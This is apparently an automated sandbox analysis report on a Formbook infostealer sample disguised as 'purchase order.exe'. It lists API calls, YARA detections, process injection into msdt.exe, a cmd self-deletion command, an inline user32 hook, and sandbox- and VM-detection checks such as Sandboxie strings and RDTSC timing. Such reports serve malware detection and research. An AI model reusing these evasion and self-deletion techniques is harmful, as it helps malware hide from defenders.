            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048999D0 NtCreateProcessEx,5_2_048999D0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899950 NtQueueApcThread,5_2_04899950
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A80 NtOpenDirectoryObject,5_2_04899A80
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A00 NtProtectVirtualMemory,5_2_04899A00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A10 NtQuerySection,5_2_04899A10
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899A20 NtResumeThread,5_2_04899A20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0489A3B0 NtGetContextThread,5_2_0489A3B0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04899B00 NtSetValueKey,5_2_04899B00
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063A050 NtClose,5_2_0063A050
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063A100 NtAllocateVirtualMemory,5_2_0063A100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639F20 NtCreateFile,5_2_00639F20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639FD0 NtReadFile,5_2_00639FD0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639FCA NtReadFile,5_2_00639FCA
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B104700_2_02B10470
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1CB7C0_2_02B1CB7C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B109400_2_02B10940
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B17C800_2_02B17C80
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B109310_2_02B10931
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1ACF00_2_02B1ACF0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1FBF80_2_02B1FBF8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B17C710_2_02B17C71
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_02B1DD900_2_02B1DD90
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063ABED80_2_063ABED8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A65200_2_063A6520
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A650F0_2_063A650F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A00400_2_063A0040
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A2ACA00_2_06A2ACA0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A27C900_2_06A27C90
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A254700_2_06A25470
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A262A00_2_06A262A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A24F200_2_06A24F20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D8532_2_0041D853
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_004010302_2_00401030
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D38E2_2_0041D38E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00402D882_2_00402D88
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00402D902_2_00402D90
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00409E302_2_00409E30
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041E73A2_2_0041E73A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00402FB02_2_00402FB0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C41202_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AF9002_2_017AF900
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018720A82_2_018720A8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018728EC2_2_018728EC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018610022_2_01861002
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187E8242_2_0187E824
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A02_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BB0902_2_017BB090
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186DBD22_2_0186DBD2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01872B282_2_01872B28
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DEBB02_2_017DEBB0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018722AE2_2_018722AE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A0D202_2_017A0D20
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018725DD2_2_018725DD
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01872D072_2_01872D07
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BD5E02_2_017BD5E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01871D552_2_01871D55
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D25812_2_017D2581
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B841F2_2_017B841F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186D4662_2_0186D466
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01871FF12_2_01871FF1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C6E302_2_017C6E30
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01872EF72_2_01872EF7
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186D6162_2_0186D616
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486841F5_2_0486841F
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491D4665_2_0491D466
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048825815_2_04882581
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049225DD5_2_049225DD
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486D5E05_2_0486D5E0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04922D075_2_04922D07
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04850D205_2_04850D20
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04921D555_2_04921D55
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04922EF75_2_04922EF7
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491D6165_2_0491D616
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04876E305_2_04876E30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492DFCE5_2_0492DFCE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04921FF15_2_04921FF1
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486B0905_2_0486B090
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048820A05_2_048820A0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049220A85_2_049220A8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049228EC5_2_049228EC
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049110025_2_04911002
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0492E8245_2_0492E824
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485F9005_2_0485F900
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048741205_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049222AE5_2_049222AE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0490FA2B5_2_0490FA2B
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488EBB05_2_0488EBB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491DBD25_2_0491DBD2
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_049103DA5_2_049103DA
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04922B285_2_04922B28
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487AB405_2_0487AB40
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D8535_2_0063D853
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D8165_2_0063D816
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D38E5_2_0063D38E
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00622D885_2_00622D88
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00622D905_2_00622D90
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00629E305_2_00629E30
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063E73A5_2_0063E73A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00622FB05_2_00622FB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0485B150 appears 48 times
            Source: C:\Users\user\Desktop\purchase order.exeCode function: String function: 017AB150 appears 35 times
            Source: purchase order.exe, 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKedermister.dllT vs purchase order.exe
            Source: purchase order.exe, 00000000.00000000.333598877.00000000009B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
            Source: purchase order.exe, 00000002.00000000.353042240.0000000000CD0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs purchase order.exe
            Source: purchase order.exeBinary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
            Source: C:\Users\user\Desktop\purchase order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
            Source: purchase order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\purchase order.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: purchase order.exeVirustotal: Detection: 28%
            Source: purchase order.exeReversingLabs: Detection: 19%
            Source: unknownProcess created: C:\Users\user\Desktop\purchase order.exe 'C:\Users\user\Desktop\purchase order.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exeJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'Jump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: purchase order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: purchase order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
            Source: Binary string: msdt.pdbGCTL source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: purchase order.exe, msdt.exe
            Source: Binary string: msdt.pdb source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A5252 push ecx; iretd 0_2_063A5253
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A2B1C push es; iretd 0_2_063A2B22
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A2E18D push FFFFFF8Bh; iretd 0_2_06A2E18F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041C802 push esi; iretd 2_2_0041C803
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D0CB push eax; ret 2_2_0041D132
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041E172 pushfd ; ret 2_2_0041E174
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D12C push eax; ret 2_2_0041D132
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_004182CC push cs; retf 2_2_004182CE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041E4F5 push dword ptr [537421FAh]; ret 2_2_0041E515
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419C92 pushfd ; iretd 2_2_00419C98
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041674D push 8EAE14C8h; iretd 2_2_00416753
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_004167AE push C6E9D42Ah; ret 2_2_004167C2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017FD0D1 push ecx; ret 2_2_017FD0E4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048AD0D1 push ecx; ret 5_2_048AD0E4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D075 push eax; ret 5_2_0063D0C8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063C802 push esi; iretd 5_2_0063C803
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D0C2 push eax; ret 5_2_0063D0C8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D0CB push eax; ret 5_2_0063D132
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063E172 pushfd ; ret 5_2_0063E174
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D12C push eax; ret 5_2_0063D132
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_006382CC push cs; retf 5_2_006382CE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063E4F5 push dword ptr [537421FAh]; ret 5_2_0063E515
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639C92 pushfd ; iretd 5_2_00639C98
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063674D push 8EAE14C8h; iretd 5_2_00636753
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_006367AE push C6E9D42Ah; ret 5_2_006367C2
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23319521913

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEE
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM_3Show sources
            Source: Yara matchFile source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: purchase order.exe PID: 3900, type: MEMORY
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
            Source: C:\Users\user\Desktop\purchase order.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\purchase order.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\purchase order.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000006298E4 second address: 00000000006298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000629B4E second address: 0000000000629B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
